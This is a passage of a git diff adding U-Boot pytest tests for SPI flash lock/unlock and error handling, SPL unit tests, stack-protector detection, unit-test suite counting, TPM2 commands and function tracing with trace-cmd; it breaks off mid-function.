sect_unlock_start, sect_write_size, addr, -1 + ) + if EXPECTED_WRITE not in output or ret_code.endswith('1'): + spi_unlock_exit(ubman, lock_addr, lock_size) + + # Unlocking the flash + protect_ops(ubman, lock_addr, lock_size, 'unlock') + + # Check erase/write operation after un-locking + erase_write_ops(ubman, prot_start, prot_size) + + # Check previous locked sectors + sect_lock_start = random.randrange(prot_start, (prot_start + prot_size), erase_size) + if prot_size > erase_size: + sect_lock_size = random.randrange( + erase_size, (prot_start + prot_size - sect_lock_start), erase_size + ) + else: + sect_lock_size = erase_size + sect_write_size = random.randint(1, sect_lock_size) + + flash_ops( + ubman, 'erase', sect_lock_start, sect_lock_size, 0, 0, EXPECTED_ERASE + ) + flash_ops( + ubman, + 'write', + sect_lock_start, + sect_write_size, + addr, + 0, + EXPECTED_WRITE, + ) + +@pytest.mark.buildconfigspec('cmd_bdi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_memory') +def test_spi_lock_unlock(ubman): + ''' Test to check the lock-unlock functionality for SPI family flash ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + flashes = ubman.config.env.get('env__spi_lock_unlock', False) + if not flashes: + pytest.skip('No SPI test device configured for lock/unlock') + + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + total_size = get_total_size() + flash_part = get_flash_part() + + flashes_list = flashes.get('supported_flash', None).split(',') + flashes_list = [x.strip() for x in flashes_list] + if flash_part not in flashes_list: + pytest.skip('Detected flash does not support lock/unlock') + + # For lower half of memory + lock_addr = random.randint(0, (total_size // 2) - 1) + lock_size = random.randint(1, ((total_size // 2) - lock_addr)) + spi_lock_unlock(ubman, lock_addr, lock_size) + + # For upper half of memory + lock_addr = random.randint((total_size // 2), total_size - 1) + lock_size = random.randint(1, (total_size - lock_addr)) + spi_lock_unlock(ubman, lock_addr, lock_size) + + # For entire flash + lock_addr = random.randint(0, total_size - 1) + lock_size = random.randint(1, (total_size - lock_addr)) + spi_lock_unlock(ubman, lock_addr, lock_size) + + i = i + 1 + +@pytest.mark.buildconfigspec('cmd_bdi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_memory') +def test_spi_negative(ubman): + ''' Negative tests for SPI ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + spi_pre_commands(ubman, random.randint(min_f, max_f)) + total_size = get_total_size() + erase_size = get_erase_size() + page_size = get_page_size() + addr = utils.find_ram_base(ubman) + i = 0 + while i < loop: + # Erase negative test + start = random.randint(0, total_size) + esize = erase_size + + # If erasesize is not multiple of flash's erase size + while esize % erase_size == 0: + esize = random.randint(0, total_size - start) + + error_msg = 'Erased: ERROR' + flash_ops( + ubman, 'erase', start, esize, 0, 1, error_msg, EXPECTED_ERASE + ) + + # If eraseoffset exceeds beyond flash size + eoffset = random.randint(total_size, (total_size + int(0x1000000))) + error_msg = 'Offset exceeds device limit' + flash_ops( + ubman, 'erase', eoffset, esize, 0, 1, error_msg, EXPECTED_ERASE + ) + + # If erasesize exceeds beyond flash size + esize = random.randint((total_size - start), (total_size + int(0x1000000))) + error_msg = 'ERROR: attempting erase past flash size' + flash_ops( + ubman, 'erase', start, esize, 0, 1, error_msg, EXPECTED_ERASE + ) + + # If erase size is 0 + esize = 0 + error_msg = None + flash_ops( + ubman, 'erase', start, esize, 0, 1, error_msg, EXPECTED_ERASE + ) + + # If erasesize is less than flash's page size + esize = random.randint(0, page_size) + start = random.randint(0, (total_size - page_size)) + error_msg = 'Erased: ERROR' + flash_ops( + ubman, 'erase', start, esize, 0, 1, error_msg, EXPECTED_ERASE + ) + + # Write/Read negative test + # if Write/Read size exceeds beyond flash size + offset = random.randint(0, total_size) + size = random.randint((total_size - offset), (total_size + int(0x1000000))) + error_msg = 'Size exceeds partition or device limit' + flash_ops( + ubman, 'write', offset, size, addr, 1, error_msg, EXPECTED_WRITE + ) + flash_ops( + ubman, 'read', offset, size, addr, 1, error_msg, EXPECTED_READ + ) + + # if Write/Read offset exceeds beyond flash size + offset = random.randint(total_size, (total_size + int(0x1000000))) + size = random.randint(0, total_size) + error_msg = 'Offset exceeds device limit' + flash_ops( + ubman, 'write', offset, size, addr, 1, error_msg, EXPECTED_WRITE + ) + flash_ops( + ubman, 'read', offset, size, addr, 1, error_msg, EXPECTED_READ + ) + + # if Write/Read size is 0 + offset = random.randint(0, 2) + size = 0 + error_msg = None + flash_ops( + ubman, 'write', offset, size, addr, 1, error_msg, EXPECTED_WRITE + ) + flash_ops( + ubman, 'read', offset, size, addr, 1, error_msg, EXPECTED_READ + ) + + # Read to relocation address + output = ubman.run_command('bdinfo') + m = re.search(r'relocaddr\s*= (.+)', output) + res_area = int(m.group(1), 16) + + start = 0 + size = 0x2000 + error_msg = 'ERROR: trying to overwrite reserved memory' + flash_ops( + ubman, 'read', start, size, res_area, 1, error_msg, EXPECTED_READ + ) + + i = i + 1 diff --git a/test/py/tests/test_spl.py b/test/py/tests/test_spl.py new file mode 100644 index 00000000000..48407399039 --- /dev/null +++ b/test/py/tests/test_spl.py @@ -0,0 +1,43 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2020 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os.path +import pytest + +@pytest.mark.buildconfigspec('spl_unit_test') +def test_ut_spl_init(ubman): + """Initialize data for ut spl tests.""" + + fn = ubman.config.source_dir + '/spi.bin' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + +def test_spl(ubman, ut_spl_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + spl/u-boot-spl.sym. The list entries are created using the C macro + UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + ubman (ConsoleBase): U-Boot console + ut_subtest (str): SPL test to be executed (e.g. 'dm platdata_phandle') + """ + try: + ubman.restart_uboot_with_flags(['-u', '-k', ut_spl_subtest.split()[1]]) + output = ubman.get_spawn_output().replace('\r', '') + assert 'failures: 0' in output + finally: + # Restart afterward in case a non-SPL test is run next. This should not + # happen since SPL tests are run in their own invocation of test.py, but + # the cost of doing this is not too great at present. + ubman.restart_uboot() diff --git a/test/py/tests/test_stackprotector.py b/test/py/tests/test_stackprotector.py new file mode 100644 index 00000000000..a7e20d6307c --- /dev/null +++ b/test/py/tests/test_stackprotector.py @@ -0,0 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2021 Broadcom + +import pytest +import signal + +@pytest.mark.buildconfigspec('cmd_stackprotector_test') +@pytest.mark.notbuildconfigspec('asan') +def test_stackprotector(ubman): + """Test that the stackprotector function works.""" + + ubman.run_command('stackprot_test',wait_for_prompt=False) + expected_response = 'Stack smashing detected' + ubman.wait_for(expected_response) + ubman.restart_uboot() diff --git a/test/py/tests/test_suite.py b/test/py/tests/test_suite.py new file mode 100644 index 00000000000..7fe9a90dfd3 --- /dev/null +++ b/test/py/tests/test_suite.py @@ -0,0 +1,207 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2024 Google LLC + +import pytest +import re + +# List of test suites we expect to find with 'ut info' and 'ut all' +EXPECTED_SUITES = [ + 'addrmap', 'bdinfo', 'bloblist', 'bootm', 'bootstd', + 'cmd', 'common', 'dm', 'env', 'exit', 'fdt_overlay', + 'fdt', 'font', 'hush', 'lib', + 'loadm', 'log', 'mbr', 'measurement', 'mem', + 'pci_mps', 'setexpr', 'upl', + ] + + +# Set this to True to aid debugging of tests +DEBUG_ME = False + + +def collect_info(ubman, output): + """Process the output from 'ut all' + + Args: + ubman: U-Boot console object + output: Output from running 'ut all' + + Returns: + tuple: + set: suite names that were found in output + set: test names that were found in output + dict: test count for each suite: + key: suite name + value: number of tests for the suite found in output + set: missing suites (compared to EXPECTED_SUITES) + set: extra suites (compared to EXPECTED_SUITES) + """ + suites = set() + tests = set() + cur_suite = None + test_count = None + exp_test_count = {} + + # Collect suites{} + for line in output.splitlines(): + line = line.rstrip() + if DEBUG_ME: + ubman.log.info(f'line: {line}') + m = re.search('----Running ([^ ]*) tests----', line) + if m: + if DEBUG_ME and cur_suite and cur_suite != 'info': + ubman.log.info(f'suite: {cur_suite} expected {exp_test_count[cur_suite]} found {test_count}') + + cur_suite = m.group(1) + if DEBUG_ME: + ubman.log.info(f'cur_suite: {cur_suite}') + suites.add(cur_suite) + + test_count = 0 + m = re.match(rf'Running (\d+) {cur_suite} tests', line) + if m: + exp_test_count[cur_suite] = int(m.group(1)) + m = re.search(r'Test: (\w*): ([-a-z0-9_]*\.c)?( .*)?', line) + if m: + test_name = m.group(1) + msg = m.group(3) + if DEBUG_ME: + ubman.log.info(f"test_name {test_name} msg '{msg}'") + full_name = f'{cur_suite}.{test_name}' + if msg == ' (flat tree)' and full_name not in tests: + tests.add(full_name) + test_count += 1 + if not msg or 'skipped as it is manual' in msg: + tests.add(full_name) + test_count += 1 + if DEBUG_ME: + ubman.log.info(f'test_count {test_count}') + if DEBUG_ME: + ubman.log.info(f'suite: {cur_suite} expected {exp_test_count[cur_suite]} found {test_count}') + ubman.log.info(f"Tests: {' '.join(sorted(list(tests)))}") + + # Figure out what is missing, or extra + missing = set() + extra = set(suites) + for suite in EXPECTED_SUITES: + if suite in extra: + extra.remove(suite) + else: + missing.add(suite) + + return suites, tests, exp_test_count, missing, extra + + +def process_ut_info(ubman, output): + """Process the output of the 'ut info' command + + Args: + ubman: U-Boot console object + output: Output from running 'ut all' + + Returns: + tuple: + int: Number of suites reported + int: Number of tests reported + dict: test count for each suite: + key: suite name + value: number of tests reported for the suite + + """ + suite_count = None + total_test_count = None + test_count = {} + for line in output.splitlines(): + line = line.rstrip() + if DEBUG_ME: + ubman.log.info(f'line: {line}') + m = re.match(r'Test suites: (.*)', line) + if m: + suite_count = int(m.group(1)) + m = re.match(r'Total tests: (.*)', line) + if m: + total_test_count = int(m.group(1)) + m = re.match(r' *([0-9?]*) (\w*)', line) + if m: + test_count[m.group(2)] = m.group(1) + return suite_count, total_test_count, test_count + + +@pytest.mark.buildconfigspec('sandbox') +@pytest.mark.notbuildconfigspec('sandbox_spl') +@pytest.mark.notbuildconfigspec('sandbox64') +# This test is disabled since it fails; remove the leading 'x' to try it +def xtest_suite(ubman, u_boot_config): + """Perform various checks on the unit tests, including: + + - The number of suites matches that reported by the 'ut info' + - Where available, the number of tests is each suite matches that + reported by 'ut -s info' + - The total number of tests adds up to the total that are actually run + with 'ut all' + - All suites are run with 'ut all' + - The expected set of suites is run (the list is hard-coded in this test) + + """ + buildconfig = u_boot_config.buildconfig + with ubman.log.section('Run all unit tests'): + # ut hush hush_test_simple_dollar prints "Unknown command" on purpose. + with ubman.disable_check('unknown_command'): + output = ubman.run_command('ut all') + + # Process the output from the run + with ubman.log.section('Check output'): + suites, all_tests, exp_test_count, missing, extra = collect_info(ubman, + output) + ubman.log.info(f'missing {missing}') + ubman.log.info(f'extra {extra}') + + # Make sure we got a test count for each suite + assert not (suites - exp_test_count.keys()) + + # Deal with missing suites + with ubman.log.section('Check missing suites'): + if 'config_cmd_seama' not in buildconfig: + ubman.log.info("CMD_SEAMA not enabled: Ignoring suite 'seama'") + missing.discard('seama') + + # Run 'ut info' and compare with the log results + with ubman.log.section('Check suite test-counts'): + output = ubman.run_command('ut -s info') + + suite_count, total_test_count, test_count = process_ut_info(ubman, + output) + + if missing or extra: + ubman.log.info(f"suites: {' '.join(sorted(list(suites)))}") + ubman.log.error(f'missing: {sorted(list(missing))}') + ubman.log.error(f'extra: {sorted(list(extra))}') + + assert not missing, f'Missing suites {missing}' + assert not extra, f'Extra suites {extra}' + + ubman.log.info(str(exp_test_count)) + for suite in EXPECTED_SUITES: + assert test_count[suite] in ['?', str(exp_test_count[suite])], \ + f'suite {suite} expected {exp_test_count[suite]}' + + assert suite_count == len(EXPECTED_SUITES) + assert total_test_count == len(all_tests) + + # Run three suites + with ubman.log.section('Check multiple suites'): + output = ubman.run_command('ut bloblist,setexpr,mem') + assert 'Suites run: 3' in output + + # Run a particular test + with ubman.log.section('Check single test'): + output = ubman.run_command('ut bloblist reloc') + assert 'Test: reloc: bloblist.c' in output + + # Run tests multiple times + with ubman.log.section('Check multiple runs'): + output = ubman.run_command('ut -r2 bloblist') + lines = output.splitlines() + run = len([line for line in lines if 'Test:' in line]) + count = re.search(r'Tests run: (\d*)', lines[-1]).group(1) + + assert run == 2 * int(count) diff --git a/test/py/tests/test_tpm2.py b/test/py/tests/test_tpm2.py new file mode 100644 index 00000000000..064651c3e23 --- /dev/null +++ b/test/py/tests/test_tpm2.py @@ -0,0 +1,318 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Bootlin +# Author: Miquel Raynal <miquel.raynal@bootlin.com> + +import os.path +import pytest +import utils +import re +import time + +""" +Test the TPMv2.x related commands. You must have a working hardware setup in +order to do these tests. + +Notes: +* These tests will prove the password mechanism. The TPM chip must be cleared of +any password. +* Commands like pcr_setauthpolicy and pcr_resetauthpolicy are not implemented +here because they would fail the tests in most cases (TPMs do not implement them +and return an error). + + +Note: +This test doesn't rely on boardenv_* configuration value but can change test +behavior. + +* Setup env__tpm_device_test_skip to True if tests with TPM devices should be +skipped. + +""" + +updates = 0 + +def force_init(ubman, force=False): + """When a test fails, U-Boot is reset. Because TPM stack must be initialized + after each reboot, we must ensure these lines are always executed before + trying any command or they will fail with no reason. Executing 'tpm init' + twice will spawn an error used to detect that the TPM was not reset and no + initialization code should be run. + """ + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + output = ubman.run_command('tpm2 autostart') + if force or not 'Error' in output: + ubman.run_command('echo --- start of init ---') + ubman.run_command('tpm2 clear TPM2_RH_LOCKOUT') + output = ubman.run_command('echo $?') + if not output.endswith('0'): + ubman.run_command('tpm2 clear TPM2_RH_PLATFORM') + ubman.run_command('echo --- end of init ---') + +def is_sandbox(ubman): + # Array slice removes leading/trailing quotes. + sys_arch = ubman.config.buildconfig.get('config_sys_arch', '"sandbox"')[1:-1] + return sys_arch == 'sandbox' + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_init(ubman): + """Init the software stack to use TPMv2 commands.""" + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + ubman.run_command('tpm2 autostart') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_startup(ubman): + """Execute a TPM2_Startup command. + + Initiate the TPM internal state machine. + """ + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + ubman.run_command('tpm2 startup TPM2_SU_CLEAR') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +def tpm2_sandbox_init(ubman): + """Put sandbox back into a known state so we can run a test + + This allows all tests to run in parallel, since no test depends on another. + """ + ubman.restart_uboot() + ubman.run_command('tpm2 autostart') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_sandbox_self_test_full(ubman): + """Execute a TPM2_SelfTest (full) command. + + Ask the TPM to perform all self tests to also enable full capabilities. + """ + if is_sandbox(ubman): + ubman.restart_uboot() + ubman.run_command('tpm2 autostart') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + ubman.run_command('tpm2 startup TPM2_SU_CLEAR') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + ubman.run_command('tpm2 self_test full') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_continue_self_test(ubman): + """Execute a TPM2_SelfTest (continued) command. + + Ask the TPM to finish its self tests (alternative to the full test) in order + to enter a fully operational state. + """ + + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + ubman.run_command('tpm2 self_test continue') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_clear(ubman): + """Execute a TPM2_Clear command. + + Ask the TPM to reset entirely its internal state (including internal + configuration, passwords, counters and DAM parameters). This is half of the + TAKE_OWNERSHIP command from TPMv1. + + Use the LOCKOUT hierarchy for this. The LOCKOUT/PLATFORM hierarchies must + not have a password set, otherwise this test will fail. ENDORSEMENT and + PLATFORM hierarchies are also available. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + ubman.run_command('tpm2 clear TPM2_RH_LOCKOUT') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + ubman.run_command('tpm2 clear TPM2_RH_PLATFORM') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_change_auth(ubman): + """Execute a TPM2_HierarchyChangeAuth command. + + Ask the TPM to change the owner, ie. set a new password: 'unicorn' + + Use the LOCKOUT hierarchy for this. ENDORSEMENT and PLATFORM hierarchies are + also available. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + force_init(ubman) + + ubman.run_command('tpm2 change_auth TPM2_RH_LOCKOUT unicorn') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + ubman.run_command('tpm2 clear TPM2_RH_LOCKOUT unicorn') + output = ubman.run_command('echo $?') + ubman.run_command('tpm2 clear TPM2_RH_PLATFORM') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('sandbox') +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_get_capability(ubman): + """Execute a TPM_GetCapability command. + + Display one capability. In our test case, let's display the default DAM + lockout counter that should be 0 since the CLEAR: + - TPM_CAP_TPM_PROPERTIES = 0x6 + - TPM_PT_LOCKOUT_COUNTER (1st parameter) = PTR_VAR + 14 + + There is no expected default values because it would depend on the chip + used. We can still save them in order to check they have changed later. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + + force_init(ubman) + ram = utils.find_ram_base(ubman) + + read_cap = ubman.run_command('tpm2 get_capability 0x6 0x20e 0x200 1') #0x%x 1' % ram) + output = ubman.run_command('echo $?') + assert output.endswith('0') + assert 'Property 0x0000020e: 0x00000000' in read_cap + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_dam_parameters(ubman): + """Execute a TPM2_DictionaryAttackParameters command. + + Change Dictionary Attack Mitigation (DAM) parameters. Ask the TPM to change: + - Max number of failed authentication before lockout: 3 + - Time before the failure counter is automatically decremented: 10 sec + - Time after a lockout failure before it can be attempted again: 0 sec + + For an unknown reason, the DAM parameters must be changed before changing + the authentication, otherwise the lockout will be engaged after the first + failed authentication attempt. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + force_init(ubman) + ram = utils.find_ram_base(ubman) + + # Set the DAM parameters to known values + ubman.run_command('tpm2 dam_parameters 3 10 0') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + # Check the values have been saved + read_cap = ubman.run_command('tpm2 get_capability 0x6 0x20f 0x%x 3' % ram) + output = ubman.run_command('echo $?') + assert output.endswith('0') + assert 'Property 0x0000020f: 0x00000003' in read_cap + assert 'Property 0x00000210: 0x0000000a' in read_cap + assert 'Property 0x00000211: 0x00000000' in read_cap + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_pcr_read(ubman): + """Execute a TPM2_PCR_Read command. + + Perform a PCR read of the 10th PCR. Must be zero. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + + force_init(ubman) + ram = utils.find_ram_base(ubman) + + read_pcr = ubman.run_command('tpm2 pcr_read 10 0x%x' % ram) + output = ubman.run_command('echo $?') + assert output.endswith('0') + + # Save the number of PCR updates + str = re.findall(r'\d+ known updates', read_pcr)[0] + global updates + updates = int(re.findall(r'\d+', str)[0]) + + # Check the output value + assert 'PCR #10 sha256 32 byte content' in read_pcr + assert '00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00' in read_pcr + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_pcr_extend(ubman): + """Execute a TPM2_PCR_Extend command. + + Perform a PCR extension with a known hash in memory (zeroed since the board + must have been rebooted). + + No authentication mechanism is used here, not protecting against packet + replay, yet. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + force_init(ubman) + ram = utils.find_ram_base(ubman) + + read_pcr = ubman.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = ubman.run_command('echo $?') + assert output.endswith('0') + str = re.findall(r'\d+ known updates', read_pcr)[0] + updates = int(re.findall(r'\d+', str)[0]) + + ubman.run_command('tpm2 pcr_extend 10 0x%x' % ram) + output = ubman.run_command('echo $?') + assert output.endswith('0') + + # Read the value back into a different place so we can still use 'ram' as + # our zero bytes + read_pcr = ubman.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = ubman.run_command('echo $?') + assert output.endswith('0') + assert 'f5 a5 fd 42 d1 6a 20 30 27 98 ef 6e d3 09 97 9b' in read_pcr + assert '43 00 3d 23 20 d9 f0 e8 ea 98 31 a9 27 59 fb 4b' in read_pcr + + str = re.findall(r'\d+ known updates', read_pcr)[0] + new_updates = int(re.findall(r'\d+', str)[0]) + assert (updates + 1) == new_updates + + ubman.run_command('tpm2 pcr_extend 10 0x%x' % ram) + output = ubman.run_command('echo $?') + assert output.endswith('0') + + read_pcr = ubman.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = ubman.run_command('echo $?') + assert output.endswith('0') + assert '7a 05 01 f5 95 7b df 9c b3 a8 ff 49 66 f0 22 65' in read_pcr + assert 'f9 68 65 8b 7a 9c 62 64 2c ba 11 65 e8 66 42 f5' in read_pcr + + str = re.findall(r'\d+ known updates', read_pcr)[0] + new_updates = int(re.findall(r'\d+', str)[0]) + assert (updates + 2) == new_updates + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_cleanup(ubman): + """Ensure the TPM is cleared from password or test related configuration.""" + + force_init(ubman, True) diff --git a/test/py/tests/test_trace.py b/test/py/tests/test_trace.py new file mode 100644 index 00000000000..6ac1b225465 --- /dev/null +++ b/test/py/tests/test_trace.py @@ -0,0 +1,335 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os +import pytest +import re + +import utils + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_trace' + +# Decode a function-graph line +RE_LINE = re.compile(r'.*0\.\.\.\.\.? \s*([0-9.]*): func.*[|](\s*)(\S.*)?([{};])$') + + +def collect_trace(ubman): + """Build U-Boot and run it to collect a trace + + Args: + ubman (ConsoleBase): U-Boot console + + Returns: + tuple: + str: Filename of the output trace file + int: Microseconds taken for initf_dm according to bootstage + """ + ubman.run_command('trace pause') + out = ubman.run_command('trace stats') + + # The output is something like this: + # 251,003 function sites + # 1,160,283 function calls + # 0 untracked function calls + # 1,230,758 traced function calls (341538 dropped due to overflow) + # 33 maximum observed call depth + # 15 call depth limit + # 748,268 calls not traced due to depth + # 1,230,758 max function calls + + # Get a dict of values from the output + lines = [line.split(maxsplit=1) for line in out.splitlines() if line] + vals = {key: val.replace(',', '') for val, key in lines} + + assert int(vals['function sites']) > 100000 + assert int(vals['function calls']) > 200000 + assert int(vals['untracked function calls']) == 0 + assert int(vals['maximum observed call depth']) > 30 + assert (vals['call depth limit'] == + ubman.config.buildconfig.get('config_trace_call_depth_limit')) + assert int(vals['calls not traced due to depth']) > 100000 + + out = ubman.run_command('bootstage report') + # Accumulated time: + # 19,104 dm_r + # 23,078 of_live + # 46,280 dm_f + dm_f_time = [line.split()[0] for line in out.replace(',', '').splitlines() + if 'dm_f' in line] + + # Read out the trace data + addr = 0x02000000 + size = 0x02000000 + out = ubman.run_command(f'trace calls {addr:x} {size:x}') + print(out) + fname = os.path.join(TMPDIR, 'trace') + out = ubman.run_command( + 'host save hostfs - %x %s ${profoffset}' % (addr, fname)) + return fname, int(dm_f_time[0]) + + +def wipe_and_collect_trace(ubman): + """Pause and wipe traces, return the number of calls (should be zero) + + Args: + ubman (ConsoleBase): U-Boot console + + Returns: + int: the number of traced function calls reported by 'trace stats' + """ + ubman.run_command('trace pause') + ubman.run_command('trace wipe') + out = ubman.run_command('trace stats') + + # The output is something like this: + # 117,221 function sites + # 0 function calls + # 0 untracked function calls + # 0 traced function calls + + # Get a dict of values from the output + lines = [line.split(maxsplit=1) for line in out.splitlines() if line] + vals = {key: val.replace(',', '') for val, key in lines} + + return int(vals['traced function calls']) + + +def check_function(ubman, fname, proftool, map_fname, trace_dat): + """Check that the 'function' output works + + Args: + ubman (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_dat (str): Filename of output file + """ + out = utils.run_and_log( + ubman, [proftool, '-t', fname, '-o', trace_dat, '-m', map_fname, + 'dump-ftrace']) + + # Check that trace-cmd can read it + out = utils.run_and_log(ubman, ['trace-cmd', 'dump', trace_dat]) + + # Tracing meta data in file /tmp/test_trace/trace.dat: + # [Initial format] + # 6 [Version] + # 0 [Little endian] + # 4 [Bytes in a long] + # 4096 [Page size, bytes] + # [Header page, 205 bytes] + # [Header event, 205 bytes] + # [Ftrace format, 3 events] + # [Events format, 0 systems] + # [Kallsyms, 342244 bytes] + # [Trace printk, 0 bytes] + # [Saved command lines, 9 bytes] + # 1 [CPUs with tracing data] + # [6 options] + # [Flyrecord tracing data] + # [Tracing clock] + # [local] global counter uptime perf mono mono_raw boot x86-tsc + assert '[Flyrecord tracing data]' in out + assert '4096 [Page size, bytes]' in out + kallsyms = [line.split() for line in out.splitlines() if 'Kallsyms' in line] + # [['[Kallsyms,', '342244', 'bytes]']] + val = int(kallsyms[0][1]) + assert val > 50000 # Should be at least 50KB of symbols + + # Check that the trace has something useful + cmd = f"trace-cmd report -l {trace_dat} |grep -E '(initf_|initr_)'" + out = utils.run_and_log(ubman, ['sh', '-c', cmd]) + + # Format: + # u-boot-1 0..... 60.805596: function: initf_malloc + # u-boot-1 0..... 60.805597: function: initf_malloc + # u-boot-1 0..... 60.805601: function: initf_bootstage + # u-boot-1 0..... 60.805607: function: initf_bootstage + + lines = [line.replace(':', '').split() for line in out.splitlines()] + vals = {items[4]: float(items[2]) for items in lines if len(items) == 5} + base = None + max_delta = 0 + for timestamp in vals.values(): + if base: + max_delta = max(max_delta, timestamp - base) + else: + base = timestamp + + # Check for some expected functions + assert 'initf_malloc' in vals.keys() + assert 'initr_watchdog' in vals.keys() + assert 'initr_dm' in vals.keys() + + # All the functions should be executed within five seconds at most + assert max_delta < 5 + + +def check_funcgraph(ubman, fname, proftool, map_fname, trace_dat): + """Check that the 'funcgraph' output works + + Args: + ubman (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_dat (str): Filename of output file + + Returns: + int: Time taken by the first part of the initf_dm() function, in us + """ + + # Generate the funcgraph format + out = utils.run_and_log( + ubman, [proftool, '-t', fname, '-o', trace_dat, '-m', map_fname, + 'dump-ftrace', '-f', 'funcgraph']) + + # Check that the trace has what we expect + cmd = f'trace-cmd report -l {trace_dat} |head -n 70' + out = utils.run_and_log(ubman, ['sh', '-c', cmd]) + + # First look for this: + # u-boot-1 0..... 282.101360: funcgraph_entry: 0.004 us | initf_malloc(); + # ... + # u-boot-1 0..... 282.101369: funcgraph_entry: | initf_bootstage() { + # u-boot-1 0..... 282.101369: funcgraph_entry: | bootstage_init() { + # u-boot-1 0..... 282.101369: funcgraph_entry: | dlmalloc() { + # ... + # u-boot-1 0..... 282.101375: funcgraph_exit: 0.001 us | } + # Then look for this: + # u-boot-1 0..... 282.101375: funcgraph_exit: 0.006 us | } + # Then check for this: + # u-boot-1 0..... 282.101375: funcgraph_entry: 0.000 us | calc_reloc_ofs(); + + expected_indent = None + found_start = False + found_end = False + upto = None + + # Look for initf_bootstage() entry and make sure we see the exit + # Collect the time for initf_dm() + for line in out.splitlines(): + m = RE_LINE.match(line) + if m: + timestamp, indent, func, brace = m.groups() + if found_end: + upto = func + break + elif func == 'initf_bootstage() ': + found_start = True + expected_indent = indent + ' ' + elif found_start and indent == expected_indent and brace == '}': + found_end = True + + # The next function after initf_bootstage() exits should be + # initcall_is_event() + assert upto == 'calc_reloc_ofs()' + + # Now look for initf_dm() and dm_timer_init() so we can check the bootstage + # time + cmd = f"trace-cmd report -l {trace_dat} |grep -E '(initf_dm|dm_timer_init)'" + out = utils.run_and_log(ubman, ['sh', '-c', cmd]) + + start_timestamp = None + end_timestamp = None + for line in out.splitlines(): + m = RE_LINE.match(line) + if m: + timestamp, indent, func, brace = m.groups() + if func == 'initf_dm() ': + start_timestamp = timestamp + elif func == 'dm_timer_init() ': + end_timestamp = timestamp + break + assert start_timestamp and end_timestamp + + # Convert the time to microseconds + return int((float(end_timestamp) - float(start_timestamp)) * 1000000) + + +def check_flamegraph(ubman, fname, proftool, map_fname, trace_fg): + """Check that the 'flamegraph' output works + + This spot checks a few call counts and estimates the time taken by the + initf_dm() function + + Args: + ubman (ConsoleBase): U-Boot console 